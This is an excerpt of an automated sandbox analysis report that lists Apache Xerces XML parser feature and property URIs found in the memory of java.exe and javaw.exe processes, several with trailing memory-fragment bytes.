Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsmpl
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/include-comments
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/parser-settings7
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatespacheO
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only/
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlye/
Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/namespace-growth
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd:
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdch:
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refsnterna7
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refss
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs/3
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/standard-uri-conformantom2
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validate-annotations
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validate-annotationsTextI;
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
Source: java.exe, 00000007.00000002.2851354329.0000000015736000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesl
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesre1
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2851354329.0000000015736000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/dynamic
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking/sun/F
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checkingl
Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checking
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checkinges
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking=
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checkingin=
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psviint
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultO
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdecl
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdecl/A
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdeclA
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueB
Source: javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valuenternalB
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checking
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checkingn/org/B
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef/xni/XD
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdefD
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef:
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefm/su:
Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef/xerce
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-languager
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude1
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/D
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node9
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/input-buffer-sizejava/l
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory:
